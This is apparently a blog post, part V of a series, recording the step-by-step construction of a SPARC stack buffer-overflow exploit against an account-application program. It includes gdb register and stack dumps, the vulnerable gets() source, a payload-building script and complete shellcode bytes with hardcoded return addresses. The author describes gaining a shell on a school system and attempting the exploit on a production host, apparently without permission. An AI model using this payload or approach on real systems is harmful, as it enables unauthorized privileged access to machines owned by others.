Hacking Apply – Pt. V

                                                                                                          (gdb) 0x00012b2c in askyorn ()
                                                                                                                                         (gdb) $ unknown mode: cooked
                       $ stty cooked
                                    $ exit
(gdb) i r
g0             0x0      0
g1             0x6e     110
g2             0x0      0
g3             0x0      0
g4             0x0      0
g5             0x0      0
g6             0x0      0
g7             0x0      0
o0             0xffbef930       -4261584
o1             0xffbefd81       -4260479
o2             0x2919e  168350
o3             0x1      1
o4             0xff33c008       -13385720
o5             0x0      0
sp             0xffbef8c0       0xffbef8c0
o7             0x12a68  76392
l0             0x291a0  168352
l1             0x28d91  167313
l2             0xff000000       -16777216
l3             0xff0000 16711680
l4             0xff00   65280
l5             0x81000000       -2130706432
l6             0x7efefeff       2130640639
l7             0x81010100       -2130640640
i0             0x0      0
i1             0x29190  168336
i2             0xff343a54       -13354412
i3             0x0      0
i4             0xff33c008       -13385720
i5             0x0      0
fp             0xffbefd40       0xffbefd40
i7             0x11630  71216
y              0x0      0
---Type <return> to continue, or q <return> to quit---
psr            0xfe401007       -29356025
wim            0x0      0
tbr            0x0      0
pc             0x12b2c  0x12b2c <askyorn+252>
npc            0x11638  0x11638 <Acct+376>
fsr            0x0      0
csr            0x0      0
(gdb) x/96x $sp
0xffbef8c0:     0x000291a0      0x00028d91      0xff000000      0x00ff0000
0xffbef8d0:     0x0000ff00      0x81000000      0x7efefeff      0x81010100
0xffbef8e0:     0x00000000      0x00029190      0xff343a54      0x00000000
0xffbef8f0:     0xff33c008      0x00000000      0xffbefd40      0x00011630
0xffbef900:     0x00000000      0xff342fb0      0x00013da8      0x00000000
0xffbef910:     0x000292d1      0x00000024      0x00013da4      0x80000000
0xffbef920:     0x00000000      0x0000006e      0x00000000      0x00000000
0xffbef930:     0x6e6e6e6e      0x6e6e6e6e      0x110bd89a      0x9012216e
0xffbef940:     0xd023a054      0x110bdcda      0xd023a058      0x110b5a40
0xffbef950:     0xd023a05c      0xc023a060      0x9003a054      0xd023a048
0xffbef960:     0x9003a05c      0xd023a04c      0xc023a050      0x9003a054
0xffbef970:     0x9203a048      0x941b400d      0x8210203b      0x91d02008
0xffbef980:     0x901b400d      0x82102001      0x91d02008      0x41414141
0xffbef990:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbef9a0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbef9b0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbef9c0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbef9d0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbef9e0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbef9f0:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefa00:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefa10:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefa20:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefa30:     0x41414141      0x41414141      0x41414141      0x41414141
(gdb) si
0x00011638 in Acct ()
                     (gdb) $ $
$ exit
(gdb) x/96x $sp
0xffbefd40:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefd50:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefd60:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbefd70:     0x41414141      0x41414141      0xffbefe68      0xffbef930
0xffbefd80:     0x00000000      0x00013da8      0x00028d92      0x0002919e
0xffbefd90:     0x00000001      0xff33c008      0x00000000      0x00000000
0xffbefda0:     0x00000000      0x00000078      0x00000000      0xffbef9a9
0xffbefdb0:     0x00000001      0x00000001      0xff33f014      0xff320208
0xffbefdc0:     0xffbefdc8      0x0001135c      0xff33e5f0      0x00000000
0xffbefdd0:     0x00000000      0x00000000      0x00000000      0x00000000
0xffbefde0:     0x00000000      0xff3de7a8      0x00000001      0xffbefebc
0xffbefdf0:     0xffbefec4      0x0002a6e4      0x00000000      0x00000000
0xffbefe00:     0xffbefe58      0x00010fec      0x00000000      0x00027ccc
0xffbefe10:     0xffbefe78      0x00000000      0x00000000      0x00000000
0xffbefe20:     0x00000000      0x00000000      0x00000003      0x00000000
0xffbefe30:     0x00000000      0x00000000      0x00000000      0xffffffff
0xffbefe40:     0x00000000      0x00000000      0x00000000      0x00000000
0xffbefe50:     0xffbefe58      0x00010fac      0x00000001      0xffbefebc
0xffbefe60:     0x00000000      0x00000000      0x00000000      0x00000000
0xffbefe70:     0x00000000      0x00000000      0x00000000      0x00000000
0xffbefe80:     0x00000000      0x00000000      0x00000000      0x00000000
0xffbefe90:     0x00000000      0x00000000      0x00000000      0x00000001
0xffbefea0:     0xffbefebc      0x00000000      0x00000000      0x00000000
0xffbefeb0:     0x00000000      0x00000000      0x00000001      0xffbeff50
(gdb) x/10i $pc
0x11638 <Acct+376>:     mov  %o0, %g1
0x1163c <Acct+380>:     cmp  %g1, 0
0x11640 <Acct+384>:     be  0x114f4 <Acct+52>
0x11644 <Acct+388>:     nop
0x11648 <Acct+392>:     call  0x1320c <quit>
0x1164c <Acct+396>:     nop
0x11650 <Acct+400>:     b  0x114f4 <Acct+52>
0x11654 <Acct+404>:     nop
0x11658 <Acct+408>:     sethi  %hi(0x28c00), %g1
0x1165c <Acct+412>:     or  %g1, 0x190, %g1     ! 0x28d90 <ibuf>
(gdb) i r
g0             0x0      0
g1             0x6e     110
g2             0x0      0
g3             0x0      0
g4             0x0      0
g5             0x0      0
g6             0x0      0
g7             0x0      0
o0             0x0      0
o1             0x29190  168336
o2             0xff343a54       -13354412
o3             0x0      0
o4             0xff33c008       -13385720
o5             0x0      0
sp             0xffbefd40       0xffbefd40
o7             0x11630  71216
l0             0x41414141       1094795585
l1             0x41414141       1094795585
l2             0x41414141       1094795585
l3             0x41414141       1094795585
l4             0x41414141       1094795585
l5             0x41414141       1094795585
l6             0x41414141       1094795585
l7             0x41414141       1094795585
i0             0x41414141       1094795585
i1             0x41414141       1094795585
i2             0x41414141       1094795585
i3             0x41414141       1094795585
i4             0x41414141       1094795585
i5             0x41414141       1094795585
fp             0xffbefe68       0xffbefe68
i7             0xffbef930       -4261584
y              0x0      0
---Type <return> to continue, or q <return> to quit---
psr            0xfe401003       -29356029
wim            0x0      0
tbr            0x0      0
pc             0x11638  0x11638 <Acct+376>
npc            0x1163c  0x1163c <Acct+380>
fsr            0x0      0
csr            0x0      0
(gdb)

crucial address: right after the gets() in Acct:
0x11518

The exploit wasn’t working. The segfault was caused by another thing. Reg mess.

(gdb)
0x11778 <Acct+696>:     srl  %g1, 3, %g1
0x1177c <Acct+700>:     and  %g1, 1, %g1
0x11780 <Acct+704>:     cmp  %g1, 0
0x11784 <Acct+708>:     bne  0x117c0 <Acct+768>
0x11788 <Acct+712>:     nop
0x1178c <Acct+716>:     add  %fp, -28, %o2
0x11790 <Acct+720>:     ld  [ %o2 ], %o5
0x11794 <Acct+724>:     add  %fp, -24, %o4
0x11798 <Acct+728>:     ld  [ %o4 ], %g1
0x1179c <Acct+732>:     ldub  [ %g1 ], %o3

Luckily, the only reg we need to restore to normal is %o3

0x11794 <Acct+724>:     add  %fp, -24, %o4
0x11798 <Acct+728>:     ld  [ %o4 ], %g1
0x1179c <Acct+732>:     ldub  [ %g1 ], %o3
0x117a0 <Acct+736>:     inc  %g1
0x117a4 <Acct+740>:     st  %g1, [ %o4 ]
0x117a8 <Acct+744>:     mov  %o5, %g1
0x117ac <Acct+748>:     stb  %o3, [ %g1 ]

must put a good value into %fp-24

(gdb) print/x $fp-24
$1 = 0xffbefdb0

we just need a stack offset in there : )
it’s a double indirect pointer
so we need to use 2 stack values
and we need to figure out the offset in the buffer where %fp-24 variable is…
I might not be able to work with this :(

The fact that I had to guarantee double indirection is near impossible… So I am going to look elsewhere.
Already found a great place too: Groups()

Groups() comes after Acct()

Acct(&data);
Groups(&data);	/* offer choices from SETUP file */

...

Groups(datap)
struct info *datap;
{
int index, count=0;

    DBUG(HELLO,"** Groups()\n",NULL);
    blurb(Groups_inst1); gets(ibuf);
    show_params();
    for (index = 0; index < NPSETS; index++) datap->groups[index] = FREE;
    for (;;) {
      printf(GROUPS_PROMPT1);
      printf(GROUPS_PROMPT2, npsets);
      /* gets discards newline and null-terminates string */
      if ( (gets(ibuf)) == (char *)NULL ) {
        *(ibuf)   = 'x';	/* gets returns (char *)NULL on error or EOF */
	*(ibuf+1) = EOS;	/* We'll treat EOF as a 'quit'. */
      }
      else {
	if ( *ibuf == '\0' ) {	/* Empty line - no command */
          *(ibuf)   = 'p';	/* By default we'll print the menu */
	  *(ibuf+1) = EOS;
	}
      }
      switch (*ibuf) {
	case 'c':
		for (index = 0; index < NPSETS; index++)
		  datap->groups[index] = FREE;
		count=0;
		break;
	case 't':
		show_info(datap);
		break;
	case 'p':
		show_params();
		break;
	case 'q':
		if (count > 0)
		  return(SUCCESS);
		printf("You did not select any group or class.\n");
		/* FALL THROUGH */
	case 'x':
		/* Give applicant a chance to abandon the application */
		if (askyorn("Do you want to just forget the whole thing")) {
		  blurb(Groups_quit);
		  quit();
		  /* NOTREACHED */
		}
..
...

I can add a group..
hit ‘x’, buffer overflow, then ‘q’

set a break coming out of Groups()

disas Groups
...
0x0001233c <Groups+836>:        ret
0x00012340 <Groups+840>:        restore

THERE IS HOPE!!

(gdb) x/96x $sp
0xffbefc88:     0xff33fad9      0x00000000      0x00000006      0x00000000
0xffbefc98:     0x00000000      0x00000001      0x000291a0      0xff33c008
0xffbefca8:     0x00029190      0xff3439ec      0x00029190      0x000292d1
0xffbefcb8:     0x00000018      0x00015081      0xffbefce8      0xff3141fc
0xffbefcc8:     0xff343194      0x00000000      0xffbefd94      0x00000000
0xffbefcd8:     0x00000000      0x00000000      0x7efefeff      0x00000038
0xffbefce8:     0xff3439ec      0x00028d90      0xff000000      0x00ff0000
0xffbefcf8:     0x0000ff00      0x81000000      0x7efefeff      0x81010100
0xffbefd08:     0x00028d90      0x00029190      0x0002919e      0xff343a54
0xffbefd18:     0xff33c008      0x00000000      0xffbefd48      0x000120a4
0xffbefd28:     0x000291c0      0x00029720      0x00000001      0x00000006
0xffbefd38:     0xffbefd40      0x00011698      0xffbef9a8      0x00028d90
0xffbefd48:     0xffbef9a8      0x00028d90      0x00000000      0x00000000
0xffbefd58:     0x00000000      0x00000000      0x00000000      0x00000000
0xffbefd68:     0x00027ccc      0x00028d91      0x0002919e      0x00000001
0xffbefd78:     0xff33c008      0x00000003      0xffbefdc8      0x00011424
0xffbefd88:     0x00000007      0x00027ccc      0x00000006      0xff343a54
0xffbefd98:     0x00000000      0x00027cd8      0x00027cc0      0x00000031
0xffbefda8:     0xfffffff5      0x000284d5      0x00000004      0x00000003
0xffbefdb8:     0xff33f014      0xff320208      0xffbefdc8      0x0001135c
0xffbefdc8:     0xff33e5f0      0x00000000      0x00000000      0x00000000
0xffbefdd8:     0x00000000      0x00000000      0x00000000      0xff3de7a8
0xffbefde8:     0x00000001      0xffbefebc      0xffbefec4      0x0002a6e4
0xffbefdf8:     0x00000000      0x00000000      0xffbefe58      0x00010fec

looks for the 00000004 that is our target must write with 0x01
here is where our buffer began:

0xffbef938:     0x6e414141      0x41414141      0x41414141      0x41414141
0xffbef948:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbef958:     0x41414141      0x41414141      0x41414141      0x41414141
0xffbef968:     0x41414141      0x41414141      0x41009

MONEY
right at the beginning of apply execution, there is a call to this function:

switch (action = Get_old_pw(&data)) {

in that function is a call to my favorite vulnerable function, askyorn()

Get_old_pw(datap)
struct info *datap;
{
struct passwd *pw;
int try;

    DBUG(HELLO,"** Get_old_pw()\n",NULL);
    if (askyorn("Do you already have an account with us")) {
	printf("Please enter your login name: ");
	gets(datap->login);
	/*
	 *   always setpwent() to rewind, since previous getpw*'s
	 *   leave the file pointer in an indeterminate state.
	 */
	setpwent();
	if ( (pw=getpwnam(datap->login)) == NULL ) {
	    printf("Account for %s not found in database.\n",datap->login);
	    printf("Your account will have to be recreated.\n");
	    if (askyorn("Do you want to re-use that login name")) {
		printf("OK.  Re-using %s in this application.\n",datap->login);
		return(RECREATE);
	    }
	    else
		return(CREATE);
	}
	else {	/* verify user's identity */
	    for (try=0; try<NTRIES; try++, printf("\nNope.  Try again.\n")) {
		if (EQUAL(pw->pw_passwd,
		    crypt(getpass(PROMPT),pw->pw_passwd))) {
			strncpy(datap->pass,pw->pw_passwd,SBUF);
			strncpy(datap->name,pw->pw_gecos,SBUF);
			return(MODIFY);
		}
	    }
	    printf("No match in %d tries.", try);
	    printf("  Your password must be reset.\n");
	    fatal("Please see the operator or System Administrator.");
	}
    }
    else
	return(CREATE);
}

This is EXACTLY the kind of behavior I want — fill the buffer and return,return without doing anything! <3 At this point, I have successfully exploited a locally run GDB version of the program. What's next is to produce a NOP-SLED with slicing capabilities. Step one to doing this : Figure out the max size of the SLIDE earlier I had this:

1092 + ‘nnnn’ = 1096

# asmshell5_interactive.bin is 84 bytes
perl -e ‘print “nnnnnnnn”;’
cat asmshell5_interactive.bin
# 92 bytes so far
# 1096 – 92 = 1004
perl -e ‘print “A”x1004′
printf “\xff\xbe\xfe\x68″
printf “\xff\xbe\xf9\x30″ # code will start at 0xffbef938
# return address goes here

turn it into this:
I would like to turn this into C :
1004 / 4 = 251 NOPs

"nnnnnnnn"
251 NOPS
shellcode
fp
retaddr

but i just prefer using bash for hits

bazz@life[pts/2][~/latest] cat build_apply_sc2
# asmshell5_interactive.bin is 84 bytes
perl -e 'print "nnnnnnnn";'
cat asmshell5_interactive.bin
# 92 bytes so far
# 1096 - 92 = 1004
perl -e 'print "\x01"x1004'
printf "\xff\xbe\xfe\x68"
printf "\xff\xbe\xf9\x30" # code will start at 0xffbef938
# return address goes here
bazz@life[pts/2][~/latest] ./build_apply_sc2 > /tmp/B
bazz@life[pts/2][~/latest] od -t x1 -A d /tmp/B
0000000 6e 6e 6e 6e 6e 6e 6e 6e 11 0b d8 9a 90 12 21 6e
0000016 d0 23 a0 54 11 0b dc da d0 23 a0 58 11 0b 5a 40
0000032 d0 23 a0 5c c0 23 a0 60 90 03 a0 54 d0 23 a0 48
0000048 90 03 a0 5c d0 23 a0 4c c0 23 a0 50 90 03 a0 54
0000064 92 03 a0 48 94 1b 40 0d 82 10 20 3b 91 d0 20 08
0000080 90 1b 40 0d 82 10 20 01 91 d0 20 08 01 01 01 01
0000096 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01
*
0001088 01 01 01 01 01 01 01 01 ff be fe 68 ff be f9 30
0001104
bazz@life[pts/2][~/latest] od2sc /tmp/B
"\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x11\x0b\xd8\x9a\x90\x12\x21\x6e"
"\xd0\x23\xa0\x54\x11\x0b\xdc\xda\xd0\x23\xa0\x58\x11\x0b\x5a\x40"
"\xd0\x23\xa0\x5c\xc0\x23\xa0\x60\x90\x03\xa0\x54\xd0\x23\xa0\x48"
"\x90\x03\xa0\x5c\xd0\x23\xa0\x4c\xc0\x23\xa0\x50\x90\x03\xa0\x54"
"\x92\x03\xa0\x48\x94\x1b\x40\x0d\x82\x10\x20\x3b\x91\xd0\x20\x08"
"\x90\x1b\x40\x0d\x82\x10\x20\x01\x91\xd0\x20\x08\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01"
"\x01\x01\x01\x01\x01\x01\x01\x01\xff\xbe\xfe\x68\xff\xbe\xf9\x30"

looking good. Let’s get it into C. The only offsets I’ll be changing are 1100,1101,1102,1103 for the return address. We need smart PTY “signal handling”. I use CTRL-V to print out a raw ctrl character to grab its hex code:

 
bazz@life[pts/2][~/latest] printf "^S" | od -t x1
0000000 13
0000001

CTRL-S will adjust the return address based on a slicing algorithm I’ve yet to create, and CTRL-D as always, sends the payload without a carriage return. CR is manually inserted with CTRL-J.

made sure I was doing things correctly:

#include <stdint.h>
main()
{
  uint32_t calc_RA = 0x12345678; //calculated return address
  char c;

  c = ( calc_RA >> 24 ) & 0xff;
  printf ("MSB = %2x\n", c);

  c = ( calc_RA >> 16 ) & 0xff;
  printf ("byte 3 = %2x\n", c);

  c = ( calc_RA >> 8 ) & 0xff;
  printf ("byte 2 = %2x\n", c);

  c = ( calc_RA  ) & 0xff;
  printf ("LSB = %2x\n", c);
}

its useful to know the ret address of Get_old_pw: 0x00011a58

NOP SLIDE RANGE IS FROM 0xffbef940 -> 0xffbefd2C

I am now at the point where I can get a shell on my own remote system demo,
I can get the shell invoking the application on a remote system at school,
but no on the actual production machine… I wonder….
Could they be using ASLR??? is the stack at a different location?? My best guess is that it’s running in 64-bit mode, which is unlikely…
7FFFC000-7FFFFFFF is the stack space, 16KB, 16384 bytes.
midd le is 7FFFE000
The shell code is the same for the 64-bit version…

Well I just tried all the 64-bit stack space.. that didnt work… I did skip one offset to hell with it.

Since I have no idea what to do, I’m just like -.- what else can I find on blade60?? HM i dunno let’s try this:

grep -r -i "blade60" / 2>/dev/null > anything_blade60_related # 

TO BE CONTINUED

Leave a Reply

Your email address will not be published. Required fields are marked *

*